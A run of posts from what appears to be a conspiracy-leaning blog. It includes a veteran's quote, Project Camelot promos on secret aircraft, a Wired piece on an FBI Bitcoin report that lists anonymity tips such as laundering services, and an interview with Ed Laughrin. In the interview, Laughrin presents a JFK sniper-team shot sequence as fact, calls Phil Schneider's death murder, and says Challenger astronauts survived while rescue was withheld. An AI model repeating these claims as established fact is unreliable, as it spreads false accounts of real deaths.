VETERAN: We didn’t “serve our country”; We serve the interests of Capital

VETERAN: We didn’t “serve our country”; We serve the interests of Capital

“I’ve seen a ton on the facebooks about “thanking veterans for their service.” As a veteran let me just be very straightforward and honest with you. We didn’t “serve our country”; we don’t actually serve our brothers/sisters or our neighbors. We serve the interests of Capital. We never risked our lives or spent months on deployment away from our family and friends so they can have this abstract concept called “freedom”. We served big oil; big coal; Coca-Cola; Kellogg, Brown, and Root and all the other big Capital interests who don’t know a fucking thing about sacrifice. These people will never have to deal with the loss of a loved one or the physical and/or psychological scars that those who “serve”, and their families, have to deal with for the rest of their lives. The most patriotic thing someone can do is to tell truth to power and dedicate yourself to building power to overthrow these sociopathic assholes. I served with some of the most real and genuine people I’ve ever met. You’ll never see solidarity like the kind of solidarity you experience when your life depends on the person next to you. But most of us didn’t join for that; we joined because we were fucking poor and didn’t have many other options.” -Anonymous

TOP SECRET AEROSPACE TECHNOLOGY: Michael Schratt – Beyond Blue

TOP SECRET AEROSPACE TECHNOLOGY: Michael Schratt – Beyond Blue

http://youtu.be/woMtIHwRL2w

Michael Schratt is an aviation historian. As a cutting-edge researcher into classified projects and unidentified craft he has met with and interviewed numerous scientists and aerospace engineers, pilots and executives from NASA and the defense industry. He investigates clues to planes that have been documented as having been flown by military from within both secret and top secret programs… He firmly believes that American tax-payers have every right to know where our money is being spent. Many of the craft he has documented are being funded within black projects… And he states that billions are being spent today on these craft. Some will only be flown once.

In this fascinating interview shot on the fly, during an impromptu meeting, Michael talks about many of the more prominent cases of classified and unclassified but often mysterious planes and aircraft that have graced our skies but remain elusive from history and the public record.

http://youtu.be/OcGJpd2aW_c

Michael Schratt | Code Blue

This is the second part of the interview with Michael Schratt. I apologize for the long delay in getting this out there. I brought on board a new editor to help give this a more professional look, Ben Northenor. I think you will notice the difference!

This interview is a great overview of the UFO, above top secret, black aircraft being developed by our secret government for use in a variety of scenarios. Not the least of which is potentially Project Blue Beam. As an in depth researcher, a self-labeled aerospace historian and someone who has secret sources within the aerospace industry, Michael is a dynamite guy to have on ones team.

Note: If you enjoy this interview please consider making a donation.

Special thanks to Ben Northenor for donating his time and editing skills to Project Camelot. And to Michael Schratt for supplying the stills.

Kerry Lynn Cassidy
Project Camelot
January 2011
Los Angeles, CA

 

SOURCE: http://projectcamelotproductions.com/interviews/michael_schratt/michael_schratt.html

Real Journalism Under Attack: RAP NEWS Nails it Again with “A News Hope”

Real Journalism Under Attack: RAP NEWS Nails it Again with “A News Hope”

Juice Rap News: Episode XIII – A NEWS HOPE. It is a time of corporate war; deprived of a reliable media the people of Planet Earth are kept misinformed and in a state of perpetual conflict. Is an honest Fourth Estate the only Force than can restore peace and balance to the Galaxy? To find out, we consult two of journalism’s most influential and inflammatory figures: Rebel journalist enfant terrible, Julian Assange, who awaits a verdict in London which could see him ‘extradited’ to Sweden. And on the opposite end of the journalistic spectrum: Rupert Murdoch, head of the mighty NewsCorp media Empire, embroiled in legal scandals that go to the highest and lowest levels of celebrity in Britain. In the manichean manner of some ancient laser sword and forcery epic, join the wisest news-anchor in the Galaxy, Robert Foster, as he attempts to wrangle these two figures together for a rap-debate. Will the light or the dark side prevail – and is it really that easy to know which is which? How many Bothans died to bring us this information? Is the Force Estate with Robert? Will we see THE RETURN OF THE JOURNALI before the EMPIRE EXTRADITES BACK? For answers to all these questions and more, pull down your blast shields, switch off your on-board computer and feel the Force, in this latest episode of Juice Rap News… or click play.

CONNECT with us through:
Our website: http://thejuicemedia.com
Twitter: http://twitter.com/juicerapnews
Farcebook: https://www.facebook.com/rapnews

DOWNLOAD free MP3: http://www.reverbnation.com/rapnews
LYRICS available here: http://thejuicemedia.com/video/lyrics

SUPPORT the creation of new episodes of Juice Rap News – a show which relies on private donations: http://thejuicemedia.com/donate

CREDITS:
– ARTWORK by Zoe Tame http://visualtonic.com.au
– ORIGINAL MUSIC: Main Beat: “The Golden Era” – by The GOAT, ILL Beat Constructor: http://www.thegoatbeats.com
– ORIGINAL RAP-WARS theme music composed by Adrian Sergovich.
– VIDEO: Special thanks to Jonas Schweizer in Germany for creating the animated intro and RapWars special FX. (ATM he’s working on an awesome new documentary project: http://www.indiegogo.com/CaribbeanNewcomer)
– Many thanks to the following humans for lending their time and talent to the making of this episode: Ellen (Brianna Manning and SwededTrooper_1) and Zoe (SwedeTrooper_2); Lucy for voiceovers (Admiral Gillard, Manning & SwedeTroopers); Rosie Dunlop for make-up magick; Dave Abbott for technical & video advice. And finally, to Kristinn Hrafnsson of WikiLeaks for his debut kameo.

CAPTIONS: Thanks Koolfy & Siltaar at La Quadrature du Net for English captions.

TRANSLATIONS: Thanks to Euclides for Portuguese translation :)
**If you would like to translate this episode into your language, please contact us first via: http://thejuicemedia.com/contact**

An (inadvertent) FBI Guide to Keeping Your #Bitcoin Transactions Below the Radar

An (inadvertent) FBI Guide to Keeping Your #Bitcoin Transactions Below the Radar

>>> FBI BITCOIN REPORT – APRIL 2012 <<<<

The FBI sees the anonymous Bitcoin payment network as an alarming haven for money laundering and other criminal activity — including as a tool for hackers to rip off fellow Bitcoin users.

That’s according to a new FBI internal report that leaked to the internet this week, which expresses concern about the difficulty of tracking the identify of anonymous Bitcoin users, while also unintentionally providing tips for Bitcoin users to remain more anonymous.

The report titled “Bitcoin Virtual Currency: Unique Features Present Distinct Challenges for Deterring Illicit Activity,” (.pdf) was published April 24 and is marked For Official Use Only (not actually classified), but was leaked to the internet on Wednesday.

In the document, the FBI notes that because Bitcoin combines cryptography and a peer-to-peer architecture to avoid a central authority, contrary to how digital currencies such as eGold and WebMoney operated, law enforcement agencies have more difficulty identifying suspicious users and obtaining transaction records.

Though the Bureau expresses confidence that authorities can still snag some suspects who use third-party Bitcoin services that require customers to submit valid identification or banking information in order to convert their bitcoins into real-world currencies, it notes that using offshore services that don’t require valid IDs can thwart tracking by law enforcement.

Bitcoin is an online currency that allows buyers and sellers to exchange money anonymously. To “cash out,” the recipient has to convert the digital cash into U.S. dollars, British pounds or another established currency. Bitcoin is used as a legitimate form of payment by numerous online retailers selling traditional consumer goods, such as clothing and music. But it’s also used by underground sites, such as Silk Road, for the sale of illegal narcotics.

To generate bitcoins, users have to download and install a free Bitcoin software client to their computers. The software generates Bitcoin addresses or accounts — a unique 36-character string of numbers and letters — to receive Bitcoin payments. The currency is stored on the user’s computer in a virtual “wallet.” Users can create as many addresses or accounts that they want.

To send bitcoins, the sender enters the recipient’s address as well as the number of bitcoins she wants to transfer to the address. The sender’s computer digitally signs the transaction and sends the information to the peer-to-peer Bitcoin network, which validates the transaction in a matter of minutes and releases the coins for the receiver to spend or convert.

The conversion value fluctuates with supply and demand  and the trust in the currency. As of last month, there were more than 8.8 million bitcoins in circulation, according to Bitcoin, with a value of about $4 and $5 per bitcoin. The FBI estimates in its report that the Bitcoin economy was worth between $35 million and $44 million.

It’s easy to see the attraction for criminals.

“If Bitcoin stabilizes and grows in popularity, it will become an increasingly useful tool for various illegal activities beyond the cyber realm,” the FBI writes in the report. “For instance, child pornography and Internet gambling are illegal activities already taking place on the Internet which require simple payment transfers. Bitcoin might logically attract money launderers, human traffickers, terrorists, and other criminals who avoid traditional financial systems by using the Internet to conduct global monetary transfers.”

Bitcoin transactions are published online, but the only information that identifies a Bitcoin user is a Bitcoin address, making the transaction anonymous. Or at least somewhat anonymous. As the FBI points out in its report, the anonymity depends on the actions of the user.

Since the IP address of the user is published online with bitcoin transactions, a user who doesn’t use a proxy to anonymize his or her IP address is at risk of being identified by authorities who are able to trace the address to a physical location or specific user.

And a report published by researchers in Ireland last year showed how, by analyzing publicly available Bitcoin information, such as transaction records and user postings of public-private keys, and combining that with less public information that might be available to law enforcement agencies, such as bank account information or shipping addresses, the real identity of users might be ascertained.

But the FBI helpfully lists several ways that Bitcoin users can protect their anonymity.

  • Create and use a new Bitcoin address for each incoming payment.
  • Route all Bitcoin traffic through an anonymizer.
  • Combine the balance of old Bitcoin addresses into a new address to make new payments.
  • Use a specialized money-laundering service.
  • Use a third-party eWallet service to consolidate addresses. Some third-party services offer the option of creating an eWallet that allows users to consolidate many bitcoin address and store and easily access their bitcoins from any device.
  • Individuals can create Bitcoin clients to seamlessly increase anonymity (such as allowing users to choose which Bitcoin addresses to make payments from), making it easier for non-technically savvy users to anonymize their Bitcoin transactions.

But the bigger risk for crooks and others who use bitcoin might not come from law enforcement identifying them, but from hackers who are out to rob their virtual Bitcoin wallets dry.

There have been several cases of hackers using malware to steal the currency in the virtual wallet stored on a user’s machine.

Last year, computer security researchers discovered malware called “Infostealer.Coinbit” that was designed specifically to steal bitcoins from virtual Bitcoin wallets and transfer them to a server in Poland.

One Bitcoin user complained in a Bitcoin forum that 25,000 bitcoins had been stolen from an unencrypted Bitcoin wallet on his computer. Since the exchange rate for bitcoins at the time was about $20 per bitcoin, the value of his loss at the time was about $500,000. A popular web hosting company called Linode was also infiltrated by an attacker looking to pilfer bitcoins.

And there have also been cases of hackers attempting to use “botnets” to generate bitcoins on compromised machines.

According to the FBI, quoting an anonymous “reliable source,” last May someone compromised a cluster of machines at an unidentified Midwestern university in an attempt to manufacture bitcoins. The report doesn’t provide any additional details about the incident.

http://www.wired.com/threatlevel/2012/05/fbi-fears-bitcoin/

 

CAMELOT WHISTLEBLOWER DEAD: Ed Laughrin – Kennedy Ballistics & Space Shuttle Challenger Facts Revealed

CAMELOT WHISTLEBLOWER DEAD: Ed Laughrin – Kennedy Ballistics & Space Shuttle Challenger Facts Revealed

http://youtu.be/-xa1zduo4cg

I am very sorry to report that the Camelot witness, Ed Laughrin has died suddenly of a heart attack.  Apparently, he died on May 3rd.  This has been reported to me tonight from Stew Webb who was in fairly regular communication with him.

He was contacted by Ed’s wife who said that Ed had received a threat over the phone, threatening him and his wife. and shortly after that had a massive heart attack.  She called Stew tonight to give him the news.

Stew is looking into the situation.  He said that Ed’s wife is not staying at the house at this time as she does not feel safe there.

Please join me in sending loving energy and thanks to this brave man, who toward the end of his life came forward to give evidence on the ballistics of the Kennedy assassination and was also investigating other situations that he found suspicious.

Ed was a profoundly principled man and an American patriot who dedicated his life to his country.  He had a great admiration for John Kennedy and wanted to see the truth come out about the assassination as well as many other matters.

ed laughrin

For those that would like to listen to the interview here is the link.

Thank you Ed for your service to humanity.

I will post updates to this story as they are received.

Thursday, 17 May 2012 21:43
Written by Kerry Cassidy

Ed Laughrin is a retired ex-Navy/intelligence specialist with a background in ballistics who in his spare time has thoroughly investigated the Kennedy assassination. In this recorded phone call he describes the exact trajectory of the bullets fired during the event.

This audio interview was recorded without pretense or preparation due to an impending operation Ed was about to undergo where he wanted to make sure that his testimony was taken by someone who would document for the public the areas of his research.

From that point we moved onto the Challenger disaster because as it happens, he was onboard the first Navy vessel to encounter the downed capsule when it hit the water after the crash. What he reveals here is clear evidence of supreme negligence on the part of NASA which leads to the possible conclusion that there was malice and intent in this lack of action to save our astronauts.

This testimony brings into sharp relief evidence of a organization working toward a particular agenda that does not safeguard the well being of Americans and specifically our astronauts under circumstances whereby the agenda they are working with takes precendence. This is unconscionable.

Prior evidence of the hidden mission behind NASA is well documented by Richard C. Hoagland and Mike Bara in their groundbreaking book Dark Mission. Highly recommended.

Given the rough quality of this impromptu testimony with regard to the Challenger disaster evidence of negligence obviously requires a great deal more investigation. I encourage researchers to take this testimony and investigate further. There must be others out there who were on board the Navy vessel and witnessed the events causing their ship to be turned away from attempting to rescue the astronauts at that critical juncture.

As we move into the future whistleblowers from within the Matrix who have witnessed events where the agenda of the PTB swings into play and alters the world from that point forward should begin to surface. History was made but it was also witnessed. Those witnesses are everywhere. They are your brothers, sisters, mothers, fathers… As awareness grows they will begin to come forward and the real truth behind the curtain of secrecy will be revealed provided they have the courage to realize that they have nothing to fear but fear itself.

Link to video of Challenger disaster

Kerry Cassidy
Project Camelot
November 6, 2011

 

 

Ed Laughrin – Audio Interview

Kennedy Ballistics and the Challenger Crash
October 9, 2011

 

Ed Laughrin (Ed): …[over] this… material, and use your own judgment, because I don’t want to put you or anybody associated with you, in trouble, [in] any danger. And also too, I was sort of taken back with your audio [interview] with Gordon Novel, because he knew a lot about this.

Kerry Cassidy (Kerry):  Right.

Ed:  And he said it was a perfect operation. Well, you might say, yes. But I would never laugh or joke about the seriousness of this. I remember when I was 11 years old, and… when it happened, and I grew up in the Mahoning Valley. And, well, in 1960, I was just a wee little kid, eight years old. And I sat on my dad’s shoulders and there’s quite a turnout in Youngstown, and we listened to John F. Kennedy’s speech. So, I was close enough that I saw him. I looked at him. I heard him loud and clear, and I was cheering like everybody else. But, anyhow, maybe that should be up to your own personal discretion. ____

Kerry:  Okay. Well, at this moment, because we are recording and because you’ve come to me, this is… what I’d like to do, is just qualify this recording and say this is Sunday, October 9th, 2011.

Ed:  Okay. [Correct.]

Kerry:  And your name… Are you coming out under your name? Do you want your name on the material or not?

Ed:  Yeah. Might as well take credit for it. And I’ve already been threatened. People know who I am. [But who…]

Kerry:  Please state your name.

Ed:  It’s Edward Gerard Laughrin.

Kerry:  Okay. And if you give a slight background as to who you are and how you got involved, before you explain what the information is.

Ed:  Well, I’m [a] retired civil service and I’m a former United States Navy sailor. And I’ve been around the world quite a bit. And I was engaged in two special operational groups, during my time in the United States Navy. Prior to that, I was involved with aviation, general aviation. And I enjoyed flying and I was into that, and I did a little stint as a skydiver. And my educational background — I hold a bachelor’s degree in human relations. Okay? And… [I got started…]

Kerry:  And how did you get involved in this… in investigating this material?

Ed:  Well, my father was a World War II Navy veteran. And he was one of the first ‘Seabees,’ and he and some of his veteran friends, on the 22nd of November, when this took place in 1953… As a kid, I’d hang out with him. I’d go places with my dad, naturally I would. And [heed] me up [when] it was a topic of conversation. And a lot of World War II veterans view the Zapruder film. And they noticed that the President, when he was hit [by] the fatal gunshot, that his head recoiled back. And any of them that were in combat and witnessed or had to take actions against our enemies through World War II… And even our G.I.s — a head shot to the front, always there’s a recoil back. It will snap your head back.

And that result is a mystery. Lee Harvey Oswald was always… was he really the one, the shooter? Because the sniper’s nest didn’t really make a lot of sense in the Texas School Book Depository. There’s a question that should be asked about that. When President Kennedy came up Houston Street, to the intersection of the Elm, that was a perfect shot, from the Texas School Book Depository — straight down, unimpeded, clear shot on Houston Street.

Another opportunity to take the shot would have been right at the intersection turn onto Elm Street. No shot was taken. There were credible witnesses that knew that Lee Harvey Oswald was standing on the corner of Houston and Elm Street. And then, after the presidential limousine passed by, he went up to the second floor break room. Now, it’s my opinion that the Texas School Book Depository was an observational platform. And… because it’s located where it could coordinate a sniper team.

So, [sighs] what I have come up with, is based on Dr. Crenshaw’s work, ‘Conspiracy of Silence,’ in my review of that book and thoroughly going over it. And also in the book, ‘Conspiracy of Silence,’ there are morgue pictures, post-mortem of President John F. Kennedy, and there are untainted. They are actual. And they denote a wound in the neck. And then also, fragments on the back of the neck in the upper shoulder midline. And also a small dime-sized entrance point above the right eyebrow, just below the hairline, on the right side. And then the catastrophic exit wound. So, that is obviously… you have gunshots in the front. Now, the wound in the front of the neck, it so happens to be a tracheotomy, because they opened that wound up, to ventilate the President. [coughs] Excuse me. [clears throat]

But I’ve worked everything out from an aerial picture. And part of my education is, I think of all the [firings in it], to give ballistic analysis, because I was trained in the Navy, and I went through course studies as an intelligence specialist, which dealt with aerial pictures. So, what I did, I blew this aerial picture up, scaled it, and worked the problem, based on [morgue] pictures from Parkland Hospital. Now, the sequence of shots are as follows. And I think I’m relatively pretty accurate on this.

When the presidential limousine came up to, up Houston and made a left-hand [a tree’s yard] turn onto Elm Street, the first shot that was fired, was from an upper floor area on the rooftop of the building, which is right adjacent on the same side of the street, on Elm Street. That bullet flew down the centerline with good elevation, good angle, unimpeded, clear line of shot, intentionally trying to hit the President in the back of the head. It missed. It passed over President Kennedy’s right shoulder and it struck Governor Connally. That’s bullet number one.

Bullet number two was fired directly in front of the limousine, and there’s a triple highway underpass bypass, and there’s railroad tracks there, right down on the center line in front of the limousine, with good elevation, clear line of shot. That’s the second bullet that was fired. It struck President Kennedy in the neck. [That’s number two.] Okay. President Kennedy raised his arms, and he looked in the direction of Mrs. Kennedy. And Mrs. Kennedy leaned in.

The third shot was fired, but it was pulled. Direct miss. Because the sniper on the grassy knoll did not want to penetrate President Kennedy’s right side of his head and have the bullet pass into Mrs. Kennedy. It missed. It struck the curb. And you can denote… you can go put your finger on the… on the nick on the curb. It corresponds.

Okay. Bullet number four penetrated to the right. [Pfizer.] And you can see it if you run it frame-by-frame, and the [Pfizer] is in the upright, right above a Secret Service agent in the limousine. Okay, that’s bullet number four.

Bullet number five is the kill shot. It strikes John F. Kennedy above the right eye, below the hairline. Those are the ballistics. Those are facts. That’s what happened. And there you have it. One, two, three, four, [and] five.

Kerry:  Okay. But, what I… if… correct me if I’m wrong here, but basically, you are telling me where you think the bullets went. You’re not telling me who shot them.

Ed:  Who shot them? I gave you positions, which just automatically, this should be strong evidence to clear the name of Lee Harvey Oswald, that he is not the sniper. Absolutely not. Now, I can’t prove this one way or another, but in my research and going over a lot of material, there’s a guy by the name of Sarti, and that’s on the internet, and he was a Corsican Sicilian. And then also, I talked to an individual. I’m not going to give you his name. And he’s 85 years old. And like your friend, Command Master Sergeant Bob Dean, he also was a command master sergeant in the United States Army. And he’s been there, and he went over this material with me. And he confirms the location of the kill shot, because he’s been there when he was in the Army, in Army Intelligence. And he’s 85, and he’s a resident of Florida. I spent three hours with him. And then also, I have, I know an individual who’s a Navy SEAL, who has gone over this material, and he agrees with it, based on ward pictures from Parkland Hospital, thanks to Dr. Crenshaw.

So, it’s pretty tight-knit here. I mean, there’s no room for sloth. But the blowback on this material and this work, is that it… I’m sorry to say this, but I absolutely cannot agree with the Warren Commission or Arlen Specter and the single-bullet [theory]. It’s just not factual. It just didn’t happen that way. Based on the entrance and the exit wounds on President Kennedy. And it was a horrific, horrific event. It’s absolute treason, even to this day, to murder a president, the President of the United States of America. But I understand, through a lot of my other work and everything… Well, this is basically my work — ballistics.

But all the factors, Kerry, that have come into play, all the enemies that John F. Kennedy happened to accumulate during his time in the White House, all came down on him, all at once. And that was in the Dealey Plaza on 22nd of November, 1963. And you can see today, currently, right now, that the American people are getting quite fed up with the Powers That Be. And basically, I think it’s time for people to try and get their country back by peaceful protest. And this, in and of itself, should be a motivator too, to bring back what our Founding Fathers intended for all of us, as Americans.

So, do you have any questions Kerry, for me, in addition to this? ___ [of mine. Go ahead.]

Kerry:  Well, first of all, are you familiar with the work of Robert Morningstar?

Ed:  The name’s familiar, but I can’t stay I’m really familiar with any of his work. No, I’m not. _____

Kerry:  Okay. Well, I did an interview with him quite some time ago. We talked in brief about the Kennedy assassination. He’s been investigating it for years and has also written books about them. There… I believe that you may have some information that might be useful to some other researchers, but to tell you the truth, you don’t really have anything, that I can tell, that is more over-the-top than what is generally known at this point. No one believes there was a lone gunman, unless they’re just part of the mainstream and they’re just so programmed, they really can’t see straight.

Ed:  Yeah. You’re right there. Yeah.

Kerry:  So, at this moment, there’s no doubt that it was a conspiracy. There’s no doubt that there was a number of individuals and organizations involved. Certainly the CIA, certainly the mob at the time. And…

Ed:  Yeah.

Kerry:  And from what I understand, there could be some other elements including the Israelis. But at this moment, what you were telling me doesn’t really constitute anything too [radical]. So, if you keep it quiet, it’s when they bother you. It’s when they’re trying to intimidate you, just to get you to shut up or just to mess with you, because they’ve got nothing better to do with themselves.

Ed:  Well, _______. The one thing that concerns me, I agree with your good advice that you’re giving me. But Phil Schneider — why in the world did they knock him off? I mean, I’ve listened to him, and I… about deep military underground bases [so on and so forth].

Kerry:  Right.

Ed:  And then [they turned around]. And then I found out that Phil Schneider was left-handed. And he died from a gunshot wound of the right temple, Kerry. And there’s no possible way that he shot himself if you’re left-handed in the right temple. It’s quite awkward.

Kerry:  I mean, look. If you’re a ballistics expert of sorts… I’m not sure if that’s…

Ed:  Of sorts. Of sorts. I’ve studied it.

Kerry:  That can be very useful at looking at evidence across the board. There are many, many people that have been suicided in various ways. And so, I… Why don’t you start a YouTube channel and start going over all the cases out there, not just the Kennedy assassination, from the point of view of ballistics.

Ed:  That would give me something to do. That would give me something to do, to pass my time as a retired civil servant. [laughs] ___________

Kerry:  Well, yeah. If you have expertise like that, it can be valuable to the mainstream.

Ed:  Well, I have a knack for things. I have a way of cutting down and being… can discern and unravel things. And look for the truth, like you do. But we all do it in a different way.

Kerry:  Sure.

Ed:  Yeah. Yeah, we do. But, anyhow, I’ve given you complete ballistics. And I have talked to the Federal Bureau of Investigation about this, and they have all this material. But if… And then the individual that I talked to, I don’t feel comfortable telling you his complete name. But…

Kerry:  That’s fine.

Ed:  He said that they were picked up, this Sarti… Lucien Sarti. He was involved with [coverup].

Kerry:  Yes. I’m familiar with the name Sarti. I’m familiar with this.

Ed:  You’re familiar with him? Okay. But, they were picked up by the Dallas Police. And there are other witnesses that saw a man in front of the limousine coming down off that highway underpass/overpass and then the railroad tracks looped around. They loop around from… in front there. And then they go past the grassy knoll onward. But I have [came across] E. Howard Hunt for his deathbed confession. This was known, according to him, as ;Operation 40,’ the Big Event. And he considers himself a benchwarmer. And, from what I understand, from the internet, which is in public domain, there were like 27 individuals involved in it. And then also, another one that’s very, very dirty, is Lyndon Baines Johnson. And that’s from testimony from his mistress, that she came out with all that.

Kerry:  Yes.

Ed:  But, they were murdering people left and right over this thing. _________

Kerry:  Right. And, I mean, you’re asking why they killed Phil Schneider. I mean, Phil Schneider came forward at a time with key information. Had he come forward at this time, when the information was already out there en masse, maybe he wouldn’t have been knocked off.

Ed:  Yeah.

Kerry:  But obviously, he came forward at a certain juncture. We’re at a different time right now, and there’s the knowledge about the things he talked about, are well known in part because of him. And so, they do knock off people. They kind of pick and choose, I guess, who they decide to do that to. I like to think that they’re not doing that quite as much anymore, because they really have little to lose, because it’s becoming pretty obvious, what’s going on.

Ed:  Right. Yeah.

Kerry:  In some ways, they are still threatening people, because I’ve been threatened, and other people I know agree, but there’s a lot more leeway at this time. And especially with regard to past events. So, in the sense of what you’re talking [about], we can put this out, as it is, as an audio recording. It’s going to be fairly rough, but it is…

Ed:  Well, what I’d like to do, I’d really like to get through this ordeal, because I’m overwhelmed with what I have to go through, to get myself back in shape. It’s not going to be very pleasant, but I’m just going to have to just do this. But I’m going to wait later on. Once I get back up to feeling right, and then I can pursue this and maybe get some help from others that are far more computer-savvy in my area than I am.

Kerry:  Okay.

Ed:  But I think maybe you should just take this raw, the way it is, because I gave you the sequence of shots, and you won’t… I’ve never heard the sequence of shots, and I have studied this and pondered it, and laid awake at night. I’ve gotten up in the middle of the night and worked on it, and gone over everything. And it’s all because that I was eight years old, I sat on my dad’s shoulders at a rally for John F. Kennedy in Youngstown, Ohio. And… I was for Kennedy. And I think that was horrific the way he just got himself destroyed in Dallas. And my opinion is, that it’s high treason and there’s no statute for the limitations on treason.

Kerry:  [laughs]

Ed:  Absolutely, yeah.

Kerry:  Okay. I hear you. All right. Well, well said. Let me say this. As far as your ballistics background, can you go into more detail as to why you’re… why you think you’re sort of a semi-expert in this field. In other words what was your exact training?

Ed:  Well, when I went in the United States Navy, I had a choice. I went through a horrific de force process, because I was a fool and an idiot to get married at the age of 22. What was I thinking? But, I… It just didn’t work out. And after a nine-year period, I was getting a little on the hot… upper end. And it all just fell apart. So, I was there alone in my apartment one night, feeling sorry for myself. And I got to thinking, there’s gotta be some adventure for me. And my first thoughts were, ‘Hey, you know the French Foreign Legion might be a good way to go. You know, on second thought, I don’t speak French, so I’d be at a disadvantage. I’d have to be an extremely fast learner.’

And my second choice, actually, was the United States Navy, because my dad always used to tell me, when I was kid growing up, and my [father] used to call me ‘Edward.’ And he said, ‘Edward, if you’re ever at loose ends, just take time out and join the Navy. Be a fleet sailor and see the world.’ So, I did. And I was 30 years old when I went in, and absolutely out of shape. And I went through Great Lakes [Navy Station]. And I was in… the ‘state flags and sailors.’ You wouldn’t know what that means. And then we had ‘Triple Threat’ with us. And I sort of represented the State of Maryland. And we were like a parade unit. We were pretty fancy-looking recruits.

But I transitioned from that and graduated from boot camp. And to my great surprise, I was in extremely good physical shape and completely focused on the Navy, completely committed. And there was our division officer. There were two of us that were selected. And there was another sailor and myself. They wanted us to go to BUD School. Are you familiar with that term, ‘BUD School,’ Kerry?

Kerry:  [chuckles] No.

Ed:  Well, they wanted to transform me into a United States Navy SEAL. Well, it so happened, before I got on the bus to leave for boot camp, I [came across] Jimmy. He’s a retired Navy SEAL. And, well anyhow, he… It was too adventurous, as far as my mother was concerned, because she was a cousin to his mother, and really worried his parents quite a bit, what Jimmy was doing, especially during the Vietnam War. Because he used to take [reaper eaters] [24:59] and go in and recon the Hai Phong harbor, and things of that nature. And I promised my mother — but I thought it was a real long shot. Why would they want me to be a Navy Seal? Really. Well, for some odd reason, they thought they… They pick you. You don’t pick them, more or less. You could put a request in for it. But I was one of these characters that was getting picked on. So I declined it.

And then I went through Gunner’s Mate ‘A’ School and did quite well in that. And then I was assigned my ship. And it was the U.S.S. Aubrey Fitch (FFG-34). And I was a member of Destroyer Squadron 8 in Mayport, Florida. And our claim-to-fame was, we were the first Navy vessel to go on-scene when the Challenger exploded. And we picked up debris down there. And we all have [night] certificates and I still have mine. Presidential commendation from Ronald Reagan. But I’ve been to El Salvador… special operations, Operation Blue Light. I’ve been involved in the Persian Gulf. And I’m a Blue Nose. I’ve been up over the Arctic Ocean or Arctic Circle, rather. And I’m also a Shellback. I’ve crossed the Equator and I sailed down through the Suez Canal. And I’ve been to Karachi, and I don’t recommend it. We were there for R&R for a week. And you have to be very careful. And you be very careful when you’re in India. The Karachi’s a heck of a lot worse, let me tell you. This [is the way it is] today.

So, as I went along, I requested another additional school in the Navy. And it was intelligence specialist. So, I went through that. And… well, anyhow, the reason why I really didn’t make a career out of the United States Navy [is] my mother, we discovered she had Parkinson’s Disease. And she really wanted me to come home, because I only got two weeks’ leave out of the year, so I carried a lot of leave. We get thirty days a year. And I went… I was a member of the Naval Reserve. And then I met my second wife. And things are fine and I settled down in… here in Warren, Pennsylvania. [chuckles, clears his throat] So, that’s my background.

Kerry:  Okay…

Ed:  But I also hold a Federal Fire Arms License too, and I’m a… I do instruct as a fire arms instructor. So, I’m familiar with weapons. I’m familiar with a variety of handguns, rifles and [because I was] in the Navy, I’m very familiar with assault weapons. ______

Kerry:  Okay. It sounds like maybe you’re a little modest in terms of calling yourself a possible expert. It sounds like you are an expert.

Ed:  Well, I’ll tell you what. With the new modern technology and everything, you can’t really miss a target with some of the advanced weapons that we have today. And computers. It’s not like old school. And… it’s just absolutely amazing, how they’ve advanced on a lot of stuff. I was watching a YouTube video the other day about this new camouflage that they have, special forces, our guys. And it actually refracts light, someway, somehow. Must be nano or something, but it actually is sort of similar to… oh, you’ve seen the Arnold Schwarzenegger movie, ‘Terminator.’ Or no, it’s not. Yeah. The first… not actually ‘Terminator.’ I’ve got my movies mixed up. ‘Predator,’ with the alien that could cause himself to be relatively invisible.

Kerry:  Right, yes. Yes.

Ed:  You have that [fight there] in Central America. And Jesse Ventura got zapped in the chest with a laser. [laughs] But it’s similar to that, but the technology is so advanced, all the way around. I mean, completely, and weaponry. And then I know another individual who states that our military now has the capability to shoot somebody with ultraviolet laser. And what that does is, it causes your heart to stop. And you’re done. And you never see it. So… And I have to take issue with a lot of this stuff. I have a problem with a lot of this weapons technology. I mean, we should only use and get involved in wars — it’s my personal belief — is if we’re really threatened, our way of life. And for defensive purposes only. We should never be out running around, looking for a war. But there again, that’s the military industrial complex.

Kerry:  Right.

Ed:  Because peace is cheaper… or not cheaper, more expensive. Excuse me. Peace is more expensive than war.

Kerry:  Yes.

Ed:  For some unknown, crazy reason.

Kerry:  Okay. So…

Ed:  [sighs]

Kerry:  Let’s get back to this… to some of the things that you’ve done. One of the questions I have is the Challenger explosion.

Ed:  Okay.

Kerry:  You said you got a piece of it. And I wonder if you ever tried to investigate whether that was a natural occurrence.

Ed:  Well, I didn’t really get a piece of the Challenger. We got quite a bit of it. It was spread out. And what we were doing on that day, we were coming up, we were on an exercise, our squadron. And other Navy ships. And we go down there, what’s called a ‘PACFIRE’ in the Caribbean. And we did a missile shoot. And at that time, we had a Mark 13 missile launcher, so we fired it, at target drones. And anti-submarine warfare. That was roughly about a week’s worth. It was a work-up of exercises and drills. And we were coming up the coast. And right at the time, we were right off of the Kennedy Space Center. And we went on-deck and we tracked the ascension of the Challenger on our surface search radar. And all of a sudden, it blew up. I mean, and that was it. And then, you have the booster rockets were out of control, but they can detonate them from the ground, to destroy them.

So we tracked all the debris, and it took us twenty minutes to pull up on the crew compartment. And we had them on our surface search. And it floated for about ten minutes. And when we pulled up on it, where we were at, the ocean was relatively pretty clear and we could see the windows in the front, because it was sinking stern-first, or the back of the compartment. And we had a couple divers on-board, and we weren’t allowed to put them over the side. But the depth there on our fathometer was 90 feet. And we pulled up on the crew compartment. They submerged about 40. And then, through the grapevine in the Navy, after they waited forty-some days and pulled the bodies out, they couldn’t bail out of that thing. And there were a couple of survivors, as we found out later from Navy divers. Because there’s a grapevine. We know. I mean, there’s like, whatever. Like… ___________

Kerry:  Okay. What are you saying? You’re saying that the seven people who died, some of them survived?

Ed:  They survived the initial impact, because the… we got the aspect. When it reached terminal velocity, when it came out, I was… its ordinance dropped. It was blown free, because that’s the compartment where the crew is at, is extremely strong. It’s like a diving bell, more or less. And it fell and it hit on the left side. And the door was sprung, but they tried to jettison the door. From what we did understand, and we did see movement when we pulled up on-scene. There was movement, because the windows were pointed up and it was sinking. The back end was going under, and then we were pinging them with sonar, to get their location. And we had a medium range sonar on my ship. And they were definitely at forty feet. And they were decompressing. We could see air escaping.

